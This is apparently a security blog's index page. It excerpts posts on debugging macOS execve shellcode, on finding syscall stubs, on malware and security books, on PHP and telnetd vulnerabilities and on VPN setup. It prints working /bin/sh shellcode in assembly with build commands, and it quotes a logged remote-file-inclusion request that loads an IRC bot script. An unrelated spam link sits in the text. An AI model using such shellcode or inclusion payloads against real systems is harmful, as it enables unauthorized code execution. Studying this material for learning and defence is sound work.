Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp
syscall

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11
dustin@sholtz:~$ 

otool has the same output:

dustin@sholtz:~$ otool -tv static 
static:
(__TEXT,__text) section
start:
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
non-static:
(__TEXT,__text) section
start:
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

Update
As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp
Visit https://careclix.com to find out more regarding telemedicine

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
___mac_execve:
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
___mac_get_fd:
00000000000168ac	movl	$0x02000184,%eax
--
_execve:
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
_fchdir:
00000000000173f4	movl	$0x0200000d,%eax
dustin@sholtz:~$ 

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting setup but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx because it gets smashed by the kernel when syscall is invoked.

Book Review: Practical Malware Analysis

I’ve been dying to get this review out for a while now. There’s so much good and deep content in this book, that reading it on nights after work and weekends took longer than expected! I’ll tell you now that if you’re into computers and computer security, this book won’t let you down.This book is like having your very own personal malware analysis teacher without the expensive training costs.

About the Book

The book material is exhaustingly complete with 21 chapters + appendices covering everything from static analysis, environment setup, x86 assembly to anti-disassembly and anti-virtual machine practices. Total book content, minus lab solutions comes in at an enormous 475 pages (with lab solutions, 732 pages) . Let’s just say that you better be prepared to eat, breathe, and live malware analysis for quite some time. The skill level for the book is targeted at someone with experience in programming and security although an ambitious beginner should do fine. (more…)

Half way through Practical Malware Analysis

I’m about half way through Practical Malware Analysis and let me just say … this book is awesome! Quote me on this: I guarantee this book will go down in history as one of the best in its class. Look out for my full review!

Book Review: Hacking and Securing iOS Applications

About the Book

Hacking and Securing iOS Applications is a recently released book by Jonathan Zdziarski. This book is aimed to teach you how to

  • Compromise an iOS device
  • Steal the filesystem of an iOS device
  • Abuse the Objective-C runtime
  • Defeat iOS built in encryption
  • Protect your own applications

and much, much, more! The book comes in at just shy of 400 pages. Each chapter is broken into a specific topic and builds on previous chapters. However, there are a few chapters which are self contained and could be read without prior knowledge (e.g. Chapter 13 – Jailbreak Detection).

Audience, Skill Level, & Prereqs

This book is targeted at app developers and the how-does-ios-work-and-how-can-I-manipulate-it type person (I try not to use the term “Hacker”). Jonathan also uses the term tinkers – I like that one too!
(more…)

Critical PHP Remote Vulnerability Introduced in Fix for PHP Hashtable Collision DOS

One Security Fix Introduces Another

Today, Stefan Esser (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (update assigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December.
(more…)

A Textbook Buffer Overflow: A Look at the FreeBSD telnetd Code

Wow, I feel real sorry for the FreeBSD guys having to announce a remotely exploitable vulnerability in their Telnet Daemon on Christmas Eve! Let’s just hope that nobody uses Telnet anymore. (more…)

VPNs: Setting up your own IPSEC VPN

This is the second part of a two part article about setting up your own VPN services. In the first article I talked about how to set up an SSL-based VPN server. While SSL-based VPNs are very useful and require no inherit support from the OS, they’re only as good as the supported clients. If there isn’t a client for your device, you’re out of luck. (more…)

Book Review: The CERT Oracle Secure Coding Standard for Java

About the Book

The CERT Oracle Secure Coding Standard for Java is a huge compilation of best practices for coding bug-free and secure Java applications. The book is broken up into chapters which focus on a specific area of programming or design. Each chapter is then further broken up into individual sections that represent best practices. Each best practice is given a unique identifier along with an example or examples of non-compliant and compliant code. The book weighs in at around 700 pages and can be read front to back or used as a reference for any particular topic. (more…)

Found a PHP IRC Bot in the Wild

Strange Requests

I was grepping through my access logs the other day and noticed several requests like the following

/include/mail.inc.php?skin_board_path=http://website/j1.txt

Strange Text File

I decided to take a look at what j1.txt was and discovered that it was a (nicely commented) PHP script that would join an IRC channel and accept commands. The script looks like it was originally coded in English and was later modified by some Indonesians.

I’m not sure exactly what vulnerability is being exploited here but it’s likely a local file inclusion type vulnerability where j1.txt (the PHP code) would end up on the server and could be executed by visiting a certain URL or embedded in the current page at the current URL.

(more…)

Apache Killer vs TheXploit.com

For those of you that haven’t heard (you must live under a rock), there is currently an unpatched DoS attack against all Apache Web servers that can easily be executed from a single computer. A Perl script was posted to the Full Disclosure mailing list last weekend.

I run Apache 2.2 on TheXploit.com so I thought it’d be an interesting experiment to see what happens. So, here we go: Apache Killer vs. TheXploit (more…)

Configure a Working SSL Subdomain on WordPress While Still Using CloudFlare

CloudFlare and Securing WordPress Admin

(more…)

VPNs: Setting up your own SSL VPN

“All I want for Christmas is my own VPN…my own VPN, my own VPN” – Dustin

I’ve been wanting to have access to my own secure VPN for quite some time so that when I’m away from home and only have access to insecure networks, I don’t have to use work’s VPN for personal use or worry about someone intercepting my traffic. I looked into a couple paid VPN solutions but none of them seem to guarantee your privacy as far as I’m concerned. I figured my best option was to setup and manage my own.
(more…)

Book Review: Malware Analyst’s Cookbook and DVD

As promised last week, here is my book review of the Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code by Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard.

About the Book

The book is a huge compilation of short how-to articles called recipes on the “tools and techniques for fighting malicious code.” In addition, the book comes with a number of very useful custom written tools for automating or speeding up the process. (more…)

Secure WordPress Admin Login Without HTTPS

I use WordPress as my blogging platform and unfortunately I’m on a shared host that charges a lot extra in order to serve HTTPS…even if it’s a self-signed certificate. My only use for HTTPS is logging in to the WordPress administrative console for management and new posts so it doesn’t really make sense to fork over that extra cash. Likewise, I tried the shared certificate provided by my host but that sent WordPress into a redirect loop for some reason.

If you’re in the same boat as me, there are a couple things you can do without spending any money. (more…)

Go to Top